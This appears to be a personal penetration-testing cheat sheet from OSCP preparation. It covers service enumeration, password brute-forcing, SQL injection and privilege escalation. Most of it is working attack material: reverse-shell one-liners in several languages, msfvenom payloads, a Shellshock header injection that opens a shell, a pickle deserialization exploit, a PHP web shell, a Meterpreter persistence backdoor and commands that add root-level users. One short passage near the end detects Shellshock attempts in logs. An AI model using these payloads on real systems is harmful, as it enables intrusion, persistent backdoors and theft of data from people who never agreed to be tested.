Notes essentially from OSCP days


Discover service versions on open ports with nmap or manually. nmap: use -p- to cover all TCP ports, and also run a UDP scan: nmap -sU -sV

Go for low-hanging fruit first by looking up public exploits for the identified service versions.

HTTP site

If you find an MD5 or some other hash - try to crack it quickly

When source code or a directory listing is available, check it for credentials for things like the DB.


netdiscover -r

OS fingerprinting: xprobe2

nmap -sS -A -O -n -p1-65535

SMB (139,445):

nbtscan -r
smbclient -L -U anonymous
smbclient // -U anonymous 
enum4linux -a


nmap -p 139,445 --script=vuln

rpcclient -U ""

SNMP (UDP 161)

onesixtyone -c community 
snmpwalk -c public -v1 

SMTP: nc to port 25, then run VRFY bob to check whether that user exists.

DNS Zone Transfer

Figure out the DNS servers: host -t ns and host -t mx
Then attempt a zone transfer against each DNS server found: host -l

Complete enumeration: dnsenum
The following will attempt a zone transfer: dnsrecon -d -t axfr

Vulnerability scanning: nmap --script all <IP> (runs every NSE script, including the intrusive and dos categories, so it is very noisy; nmap --script vuln <IP> is the targeted option)


NFS (111, 2049):

rpcinfo -p <IP>
showmount -e <IP>    # list exports
showmount -a <IP>    # list clients currently mounting them
mount -t nfs <IP>:/<export> ./testing


cewl -m 6 -w mega-cewl.txt


john --wordlist=mega-cewl.txt --rules --stdout > mega-mangled

Locate db path:


hydra -l garry -F -P /usr/share/wordlists/rockyou.txt -s 8080 http-post-form "/php/index.php:tg=login&referer=index.php&login=login&sAuthType=Ovidentia&nickname=^USER^&password=^PASS^&submit=Login:F=Failed:H=Cookie\: OV3176019645=a4u215fgf3tj8718i0b1rj7ia5"

-F: stop after the first successful login

http-post-form "<url>:<post data>:F=<fail text>:H=<header>"

hydra -l root -P /root/rockyou.txt ssh



sqlmap -u --method POST --data "username=1&password=pass" -p "username,password" --cookie="PHPSESSID=crp8r4pq35vv0fm1l5td32q922" --dbms=MySQL --text-only --level=5 --risk=2

sqlmap -u "" --cookie="PHPSESSID=1im32c1q8b54vr27eussjjp6n2" -p pagename --level=5 --risk=3 -a

msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1234 -f elf > reverse.elf
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT=1234 -f raw >
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"



cut -c2-   print from the 2nd character onward (drops the first character; cut -c3- drops the first two)
rev        reverse each line: cat foo | rev


Send a crafted buffer to a TCP service (Python 2; buffer must already hold the payload string):

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('', 6660))
s.send("GET /" + buffer + " HTTP/1.1" + "\r\n\r\n")
s.close()

Python eval() (and Python 2.7 input()) code-injection payload:

__import__("os").system("netstat -antp|nc 1234")

Deserialization (pickle) exploit template

def create_command(cmd, args, flags):
    # protocol-0 pickle: GLOBAL subprocess.check_output, then REDUCE with ((cmd, args, flags),)
    template = ("csubprocess\ncheck_output\np0\n"
                "((S'{}'\np1\nS'{}'\np2\nS'{}'\np3\n"
                "tp4\ntp5\nRp6\n.")
    return template.format(cmd, args, flags)

hack = create_command('ls', '..', '-la')   # pickle.loads(hack) runs check_output(('ls', '..', '-la'))

Port knocking

for x in 27017 28017; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done

Python script template to connect to a port, send a payload and read the response (Python 2):

#!/usr/bin/env python
import socket

IP = ''
PORT = 631
MSG = open('a').read()          # payload to send, read from file 'a'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
s.send(MSG)
data1 = s.recv(1024)
print data1
data2 = s.recv(1024)
print data2
s.close()


Convert an LFI into reading PHP source code:


wpscan --url --enumerate u    # enumerate users
To brute-force the enumerated users with a wordlist: wpscan -u --wordlist /usr/share/wordlists/rockyou.txt --threads 50

Samba share

smbclient -L host
smbclient \\\\zimmerman\\public mypasswd
smbclient //billy/EricsSecretStuff -U anonymous

enum4linux -a runs all of its enumeration checks against Samba

From Crunch to generate wordlist based on options

crunch 10 10 -t %%%qwerty^ > craven.txt   This creates a wordlist of exactly 10 characters (min 10, max 10): 3 digits (%), then the string 'qwerty', then one special character (^).

Chrome browser user agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Googlebot: User-Agent: Googlebot/2.1 (+

Find open file descriptors (via /proc) whose link target matches a pattern, here *network*, when 'file' does not help:

find /proc -regex '\/proc\/[0-9]+\/fd\/.*' -type l -lname "*network*" -printf "%p -> %l\n" 2> /dev/null

MySQL supports # as a comment marker in addition to -- (which needs a trailing space)

Find text recursively in files under a folder (-l prints only the names of matching files):

grep -rnwl '/path/to/somewhere/' -e "pattern"

wpscan to scan wordpress site for vulns

wpscan --url --enumerate uap

Shellshock over HTTP: when a cgi-bin script answers (even if only with server info), inject through the User-Agent header:

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1"


Use fcrackzip to brute-force a zip archive


mangle with john?

sort cewl | uniq >>cewl2

Check cert:

openssl s_client -connect

Password Cracking

Wordpress password crack - - see .251

cat /usr/share/wordlists/rockyou.txt | python /root/labs/251/phpass_crack-master/ pass.txt -v

It seems john does a better job at cracking phpass (WordPress) hashes with a wordlist: john --wordlist=/root/rockyou.txt pass.txt




echo -n 666c6167307b7468655f717569657465 |xxd -r -p

Convert windows file to linux

cat file | dos2unix > file2

base64 -d

PUT to a web server: use Poster (Ctrl+Alt+P in Firefox), set the URL containing the file path, choose the file and PUT.

Zip all files in this folder: zip -r <archive>.zip .

Convert py to .exe with pyinstaller: "C:\Program Files\Python27\python.exe" "C:\Program Files\Python27\Scripts\"

Rev Shell



Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/ 0>&1


Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"


This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.


ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Netcat is rarely present on production systems and even if it is, there are several versions of netcat, some of which don't support the -e option: nc -e /bin/sh 1234. If you have the wrong version of netcat installed, Jeff Price points out that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

[Untested submission from anonymous reader]


One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you on TCP port 6001.

xterm -display

To catch the incoming xterm, start an X server (:1 listens on TCP port 6001). One way to do this is with Xnest, run on your system: Xnest :1
You also need to authorise the target to connect to you (run on your host): xhost +targetip

PHP web shell

<pre><?php echo shell_exec($_GET['c']);?><pre/>
The same line base64-encoded: PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJF9HRVRbJ2MnXSk7Pz48cHJlLz4K

cmd.exe >& /dev/tcp/ 0>&1



use exploit/name          # select exploit
set PAYLOAD payload/name  # select payload
show options              # show options for the selected module and payload
exploit                   # launch the exploit
sessions -l               # list sessions
sessions -i 2             # interact with session number 2
# Ctrl+Z - send the session to the background


sysinfo #display info

getsystem #windows only


meterpreter > load mimikatz

help mimikatz


msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1234 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell
msfvenom -p windows/shell_bind_tcp -f exe > labs/31/shell.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell2
msfvenom -p windows/shell_reverse_tcp -f asp LHOST= LPORT=443 -o labs/229/shell.asp
root@kali:~/labs/237/davfs# msfvenom --help-platforms
        aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nodejs, openbsd, osx, php, python, ruby, solaris, unix, windows

root@kali:~/labs/237/davfs# msfvenom --help-formats
Executable formats
        asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
        bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Meterpreter Handler:

msf> use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST <Listening_IP> (for example set LHOST
msf exploit(handler) > set LPORT <Listening_Port> (for example set LPORT 4444)
msf exploit(handler) > exploit -z

Reverse Shells:
set payload linux/armbe/shell_bind_tcp                set payload linux/ppc64/shell_reverse_tcp             set payload linux/x86/mettle/bind_ipv6_tcp_uuid
set payload linux/armle/exec                          set payload linux/x64/exec                            set payload linux/x86/mettle/bind_nonx_tcp
set payload linux/armle/mettle/bind_tcp               set payload linux/x64/mettle/bind_tcp                 set payload linux/x86/mettle/bind_tcp
set payload linux/armle/mettle/reverse_tcp            set payload linux/x64/mettle/reverse_tcp              set payload linux/x86/mettle/bind_tcp_uuid
set payload linux/armle/shell/bind_tcp                set payload linux/x64/shell/bind_tcp                  set payload linux/x86/mettle/reverse_ipv6_tcp
set payload linux/armle/shell/reverse_tcp             set payload linux/x64/shell/reverse_tcp               set payload linux/x86/mettle/reverse_nonx_tcp
set payload linux/armle/shell_bind_tcp                set payload linux/x64/shell_bind_tcp                  set payload linux/x86/mettle/reverse_tcp
set payload linux/armle/shell_reverse_tcp             set payload linux/x64/shell_bind_tcp_random_port      set payload linux/x86/mettle/reverse_tcp_uuid
set payload linux/mipsbe/exec                         set payload linux/x64/shell_reverse_tcp               set payload linux/x86/read_file
set payload linux/mipsbe/mettle/reverse_tcp           set payload linux/x86/chmod                           set payload linux/x86/shell/bind_ipv6_tcp
set payload linux/mipsbe/reboot                       set payload linux/x86/exec                            set payload linux/x86/shell/bind_ipv6_tcp_uuid
set payload linux/mipsbe/shell/reverse_tcp            set payload linux/x86/meterpreter/bind_ipv6_tcp       set payload linux/x86/shell/bind_nonx_tcp
set payload linux/mipsbe/shell_bind_tcp               set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid  set payload linux/x86/shell/bind_tcp
set payload linux/mipsbe/shell_reverse_tcp            set payload linux/x86/meterpreter/bind_nonx_tcp       set payload linux/x86/shell/bind_tcp_uuid
set payload linux/mipsle/exec                         set payload linux/x86/meterpreter/bind_tcp            set payload linux/x86/shell/reverse_ipv6_tcp
set payload linux/mipsle/mettle/reverse_tcp           set payload linux/x86/meterpreter/bind_tcp_uuid       set payload linux/x86/shell/reverse_nonx_tcp
set payload linux/mipsle/reboot                       set payload linux/x86/meterpreter/reverse_ipv6_tcp    set payload linux/x86/shell/reverse_tcp
set payload linux/mipsle/shell/reverse_tcp            set payload linux/x86/meterpreter/reverse_nonx_tcp    set payload linux/x86/shell/reverse_tcp_uuid
set payload linux/mipsle/shell_bind_tcp               set payload linux/x86/meterpreter/reverse_tcp         set payload linux/x86/shell_bind_ipv6_tcp
set payload linux/mipsle/shell_reverse_tcp            set payload linux/x86/meterpreter/reverse_tcp_uuid    set payload linux/x86/shell_bind_tcp
set payload linux/ppc/shell_bind_tcp                  set payload linux/x86/metsvc_bind_tcp                 set payload linux/x86/shell_bind_tcp_random_port
set payload linux/ppc/shell_reverse_tcp               set payload linux/x86/metsvc_reverse_tcp              set payload linux/x86/shell_reverse_tcp
set payload linux/ppc64/shell_bind_tcp                set payload linux/x86/mettle/bind_ipv6_tcp            

set payload windows/dllinject/bind_hidden_ipknock_tcp           set payload windows/patchupdllinject/bind_tcp_uuid              set payload windows/upexec/reverse_tcp_dns
set payload windows/dllinject/bind_hidden_tcp                   set payload windows/patchupdllinject/reverse_ipv6_tcp           set payload windows/upexec/reverse_tcp_rc4
set payload windows/dllinject/bind_ipv6_tcp                     set payload windows/patchupdllinject/reverse_nonx_tcp           set payload windows/upexec/reverse_tcp_rc4_dns
set payload windows/dllinject/bind_ipv6_tcp_uuid                set payload windows/patchupdllinject/reverse_ord_tcp            set payload windows/upexec/reverse_tcp_uuid
set payload windows/dllinject/bind_nonx_tcp                     set payload windows/patchupdllinject/reverse_tcp                set payload windows/vncinject/bind_hidden_ipknock_tcp
set payload windows/dllinject/bind_tcp                          set payload windows/patchupdllinject/reverse_tcp_allports       set payload windows/vncinject/bind_hidden_tcp
set payload windows/dllinject/bind_tcp_rc4                      set payload windows/patchupdllinject/reverse_tcp_dns            set payload windows/vncinject/bind_ipv6_tcp
set payload windows/dllinject/bind_tcp_uuid                     set payload windows/patchupdllinject/reverse_tcp_rc4            set payload windows/vncinject/bind_ipv6_tcp_uuid
set payload windows/dllinject/reverse_hop_http                  set payload windows/patchupdllinject/reverse_tcp_rc4_dns        set payload windows/vncinject/bind_nonx_tcp
set payload windows/dllinject/reverse_http                      set payload windows/patchupdllinject/reverse_tcp_uuid           set payload windows/vncinject/bind_tcp
set payload windows/dllinject/reverse_http_proxy_pstore         set payload windows/patchupmeterpreter/bind_hidden_ipknock_tcp  set payload windows/vncinject/bind_tcp_rc4
set payload windows/dllinject/reverse_ipv6_tcp                  set payload windows/patchupmeterpreter/bind_hidden_tcp          set payload windows/vncinject/bind_tcp_uuid
set payload windows/dllinject/reverse_nonx_tcp                  set payload windows/patchupmeterpreter/bind_ipv6_tcp            set payload windows/vncinject/reverse_hop_http
set payload windows/dllinject/reverse_ord_tcp                   set payload windows/patchupmeterpreter/bind_ipv6_tcp_uuid       set payload windows/vncinject/reverse_http
set payload windows/dllinject/reverse_tcp                       set payload windows/patchupmeterpreter/bind_nonx_tcp            set payload windows/vncinject/reverse_http_proxy_pstore
set payload windows/dllinject/reverse_tcp_allports              set payload windows/patchupmeterpreter/bind_tcp                 set payload windows/vncinject/reverse_ipv6_tcp
set payload windows/dllinject/reverse_tcp_dns                   set payload windows/patchupmeterpreter/bind_tcp_rc4             set payload windows/vncinject/reverse_nonx_tcp
set payload windows/dllinject/reverse_tcp_rc4                   set payload windows/patchupmeterpreter/bind_tcp_uuid            set payload windows/vncinject/reverse_ord_tcp
set payload windows/dllinject/reverse_tcp_rc4_dns               set payload windows/patchupmeterpreter/reverse_ipv6_tcp         set payload windows/vncinject/reverse_tcp
set payload windows/dllinject/reverse_tcp_uuid                  set payload windows/patchupmeterpreter/reverse_nonx_tcp         set payload windows/vncinject/reverse_tcp_allports
set payload windows/dllinject/reverse_winhttp                   set payload windows/patchupmeterpreter/reverse_ord_tcp          set payload windows/vncinject/reverse_tcp_dns
set payload windows/dns_txt_query_exec                          set payload windows/patchupmeterpreter/reverse_tcp              set payload windows/vncinject/reverse_tcp_rc4
set payload windows/download_exec                               set payload windows/patchupmeterpreter/reverse_tcp_allports     set payload windows/vncinject/reverse_tcp_rc4_dns
set payload windows/exec                                        set payload windows/patchupmeterpreter/reverse_tcp_dns          set payload windows/vncinject/reverse_tcp_uuid
set payload windows/loadlibrary                                 set payload windows/patchupmeterpreter/reverse_tcp_rc4          set payload windows/vncinject/reverse_winhttp
set payload windows/messagebox                                  set payload windows/patchupmeterpreter/reverse_tcp_rc4_dns      set payload windows/x64/exec
set payload windows/meterpreter/bind_hidden_ipknock_tcp         set payload windows/patchupmeterpreter/reverse_tcp_uuid         set payload windows/x64/loadlibrary
set payload windows/meterpreter/bind_hidden_tcp                 set payload windows/powershell_bind_tcp                         set payload windows/x64/meterpreter/bind_ipv6_tcp
set payload windows/meterpreter/bind_ipv6_tcp                   set payload windows/powershell_reverse_tcp                      set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_ipv6_tcp_uuid              set payload windows/shell/bind_hidden_ipknock_tcp               set payload windows/x64/meterpreter/bind_tcp
set payload windows/meterpreter/bind_nonx_tcp                   set payload windows/shell/bind_hidden_tcp                       set payload windows/x64/meterpreter/bind_tcp_uuid
set payload windows/meterpreter/bind_tcp                        set payload windows/shell/bind_ipv6_tcp                         set payload windows/x64/meterpreter/reverse_http
set payload windows/meterpreter/bind_tcp_rc4                    set payload windows/shell/bind_ipv6_tcp_uuid                    set payload windows/x64/meterpreter/reverse_https
set payload windows/meterpreter/bind_tcp_uuid                   set payload windows/shell/bind_nonx_tcp                         set payload windows/x64/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_hop_http                set payload windows/shell/bind_tcp                              set payload windows/x64/meterpreter/reverse_tcp_uuid
set payload windows/meterpreter/reverse_http                    set payload windows/shell/bind_tcp_rc4                          set payload windows/x64/meterpreter/reverse_winhttp
set payload windows/meterpreter/reverse_http_proxy_pstore       set payload windows/shell/bind_tcp_uuid                         set payload windows/x64/meterpreter/reverse_winhttps
set payload windows/meterpreter/reverse_https                   set payload windows/shell/reverse_ipv6_tcp                      set payload windows/x64/meterpreter_bind_tcp
set payload windows/meterpreter/reverse_https_proxy             set payload windows/shell/reverse_nonx_tcp                      set payload windows/x64/meterpreter_reverse_http
set payload windows/meterpreter/reverse_ipv6_tcp                set payload windows/shell/reverse_ord_tcp                       set payload windows/x64/meterpreter_reverse_https
set payload windows/meterpreter/reverse_nonx_tcp                set payload windows/shell/reverse_tcp                           set payload windows/x64/meterpreter_reverse_ipv6_tcp
set payload windows/meterpreter/reverse_ord_tcp                 set payload windows/shell/reverse_tcp_allports                  set payload windows/x64/meterpreter_reverse_tcp
set payload windows/meterpreter/reverse_tcp                     set payload windows/shell/reverse_tcp_dns                       set payload windows/x64/powershell_bind_tcp
set payload windows/meterpreter/reverse_tcp_allports            set payload windows/shell/reverse_tcp_rc4                       set payload windows/x64/powershell_reverse_tcp
set payload windows/meterpreter/reverse_tcp_dns                 set payload windows/shell/reverse_tcp_rc4_dns                   set payload windows/x64/shell/bind_ipv6_tcp
set payload windows/meterpreter/reverse_tcp_rc4                 set payload windows/shell/reverse_tcp_uuid                      set payload windows/x64/shell/bind_ipv6_tcp_uuid
set payload windows/meterpreter/reverse_tcp_rc4_dns             set payload windows/shell_bind_tcp                              set payload windows/x64/shell/bind_tcp
set payload windows/meterpreter/reverse_tcp_uuid                set payload windows/shell_bind_tcp_xpfw                         set payload windows/x64/shell/bind_tcp_uuid
set payload windows/meterpreter/reverse_winhttp                 set payload windows/shell_hidden_bind_tcp                       set payload windows/x64/shell/reverse_tcp
set payload windows/meterpreter/reverse_winhttps                set payload windows/shell_reverse_tcp                           set payload windows/x64/shell/reverse_tcp_uuid
set payload windows/meterpreter_bind_tcp                        set payload windows/speak_pwned                                 set payload windows/x64/shell_bind_tcp
set payload windows/meterpreter_reverse_http                    set payload windows/upexec/bind_hidden_ipknock_tcp              set payload windows/x64/shell_reverse_tcp
set payload windows/meterpreter_reverse_https                   set payload windows/upexec/bind_hidden_tcp                      set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/meterpreter_reverse_ipv6_tcp                set payload windows/upexec/bind_ipv6_tcp                        set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/meterpreter_reverse_tcp                     set payload windows/upexec/bind_ipv6_tcp_uuid                   set payload windows/x64/vncinject/bind_tcp
set payload windows/metsvc_bind_tcp                             set payload windows/upexec/bind_nonx_tcp                        set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/metsvc_reverse_tcp                          set payload windows/upexec/bind_tcp                             set payload windows/x64/vncinject/reverse_http
set payload windows/patchupdllinject/bind_hidden_ipknock_tcp    set payload windows/upexec/bind_tcp_rc4                         set payload windows/x64/vncinject/reverse_https
set payload windows/patchupdllinject/bind_hidden_tcp            set payload windows/upexec/bind_tcp_uuid                        set payload windows/x64/vncinject/reverse_tcp
set payload windows/patchupdllinject/bind_ipv6_tcp              set payload windows/upexec/reverse_ipv6_tcp                     set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/patchupdllinject/bind_ipv6_tcp_uuid         set payload windows/upexec/reverse_nonx_tcp                     set payload windows/x64/vncinject/reverse_winhttp
set payload windows/patchupdllinject/bind_nonx_tcp              set payload windows/upexec/reverse_ord_tcp                      set payload windows/x64/vncinject/reverse_winhttps
set payload windows/patchupdllinject/bind_tcp                   set payload windows/upexec/reverse_tcp
set payload windows/patchupdllinject/bind_tcp_rc4               set payload windows/upexec/reverse_tcp_allports

set payload bsd/sparc/shell_bind_tcp         set payload bsd/x64/shell_bind_tcp           set payload bsd/x64/shell_reverse_tcp_small  set payload bsd/x86/shell/bind_ipv6_tcp      set payload bsd/x86/shell_bind_tcp
set payload bsd/sparc/shell_reverse_tcp      set payload bsd/x64/shell_bind_tcp_small     set payload bsd/x86/exec                     set payload bsd/x86/shell/bind_tcp           set payload bsd/x86/shell_bind_tcp_ipv6
set payload bsd/x64/exec                     set payload bsd/x64/shell_reverse_ipv6_tcp   set payload bsd/x86/metsvc_bind_tcp          set payload bsd/x86/shell/reverse_ipv6_tcp   set payload bsd/x86/shell_reverse_tcp
set payload bsd/x64/shell_bind_ipv6_tcp      set payload bsd/x64/shell_reverse_tcp        set payload bsd/x86/metsvc_reverse_tcp       set payload bsd/x86/shell/reverse_tcp        set payload bsd/x86/shell_reverse_tcp_ipv6


meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.


    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -L C:\\ -X -U -i 10 -r -p 4910
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DJ_20170216.2235/DJ_20170216.2235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=4910
[*] Persistent agent script is 99650 bytes long
[+] Persistent Script written to C:\\pGjIiHMHVx.vbs
[*] Starting connection handler at port 4910 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\\pGjIiHMHVx.vbs
[+] Agent executed with PID 1504
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU


net users
net user <bob>

Run powershell command: powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -Command "dir"

Run a local SMB server to copy files to Windows hosts easily:

  1. copy files to /root/smb/
  2. service smbd start
  3. copy \\file.exe . # on the windows target

Add user

run getgui -u myadmin -p Pass1234
net user myadmin Pass1234 /add
net localgroup Administrators myadmin /add
rdesktop -u myadmin -p Pass1234 -g 80%

Run as: psexec -u alice -p alicei123 C:\HFS\shellm80c.exe

SAM: So the three locations of the SAM\Hashes are:

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>

meterpreter > run post/multi/recon/local_exploit_suggester

Firewall: XP: netsh firewall set opmode mode=DISABLE
Newer: netsh advfirewall set allprofiles state off


run getgui -u myuser -p mypass 
rdesktop -u myuser -p mypass -g 90%

Lookup windows version from product version in C:\Windows\explorer.exe:

PE (switch admin user to NT Authority/System): psexec.exe -s cmd

post/windows/gather/credentials/gpp    # Meterpreter: search Group Policy Preferences for cpassword entries

Windows Exploit Suggester

Compile i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe


atftpd --daemon --port 69 `pwd` 
c=tftp -i get shellM.exe

VNC - RealVNC4

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 -v SecurityTypes -d None
Successfully set SecurityTypes of REG_SZ.

(Also try HKCU\Software\RealVNC\WinVNC4\SecurityTypes if above does not work)


service smbd start (/root/smb is the shared folder)

Mount Using: net use z: \\\oscp\

nbtscan -r
enum4linux -a
root@kali:~# nmblookup -A
smbclient -L \\host -I -N
smbclient  //host/Bob\ Share -I -N


sqsh -S10.11.1.31 -Usa -Ppoiuytrewq -Dbankdb
vi  ~/.sqshrc
\set username=sa
\set password=password
\set style=vert
root@kali:~/# sqsh -S s128
sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'whoami'
2> go
output: NULL
(return status = 0)
1> xp_cmdshell 'type "C:\Documents and Settings\Administrator\Desktop\proof.txt"'
2> go
output: contents of proof.txt
output: NULL
(return status = 0)



Once in, look for clues in current dir and user home dir

If you find both passwd and shadow you can use unshadow to combine them and then run john: unshadow passwd shadow > combined

Always run ps aux. ps -f ax shows the parent PID; ps afx shows the process tree.

Shell shock

env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
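Added example, not from the notes: the same "() {" function-definition prefix that the probes above (and the HTTP User-Agent injection earlier on this page) rely on, used from the defender's side to pick Shellshock attempts out of Apache access logs. The log lines, IPs and timestamps are constructed for the demo.

```python
import re

# Every Shellshock payload starts with a bash function definition "() {" inside
# an environment value; CGI copies request headers straight into the environment.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def is_shellshock(value):
    """True for probe values like '() { :;}; /usr/bin/id' used above."""
    return bool(SHELLSHOCK_RE.search(value))


def find_shellshock_hits(log_lines):
    """Return (ip, request, offending header value) for every line carrying a
    payload in User-Agent or Referer, the two headers CGI exports as env vars."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        for header in ("ua", "referer"):
            if is_shellshock(m.group(header)):
                hits.append((m.group("ip"), m.group("req"), m.group(header)))
                break
    return hits


# Constructed sample access log: one UA payload, one clean request, one Referer payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2017:22:35:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { test;};echo Content-type: text/plain; echo; echo; /usr/bin/id"',
    '10.0.0.9 - - [16/Feb/2017:22:35:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"',
    '10.0.0.7 - - [16/Feb/2017:22:36:10 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 '
    '"() { :;}; /bin/bash -c /usr/bin/id" "curl/7.52.1"',
]

if __name__ == "__main__":
    for hit in find_shellshock_hits(SAMPLE_LOG):
        print(hit)
```

Matching only on the "() {" prefix rather than on specific commands catches the CVE-2014-6271 probe as well as the later variants, at the cost of flagging the local test strings above if they ever end up in a header.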

check sudo -l for a list of commands that the current user can run as other users without entering any password.

If python is found (find / -name "python*" 2>/dev/null) it can be used to get a TTY: python -c 'import pty; pty.spawn("/bin/bash")'

Find writable files for user: find / -writable -type f 2>/dev/null | grep -v ^/proc

Any suspected file run periodically (via crontab) which can be edited might allow to PE.

look through logs to find interesting processes/configurations

Find SUID files (4000 is the SUID bit, not the sticky bit; -4001 additionally requires world-execute): /bin/find / -perm -4001 -type f 2>/dev/null

SUID and SGID files owned by root (newer find wants -perm /2000; the +2000 form is obsolete):
find / -perm /2000 -user root -type f 2>/dev/null
find / -perm /4000 -user root -type f 2>/dev/null

Run a command through a SUID executable to get a shell.

/etc/passwd is writable:

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

Add a UID 0 user in both passwd and shadow (toor:toor):

echo 'toor:x:0:0:root:/root:/bin/bash' >>/etc/passwd
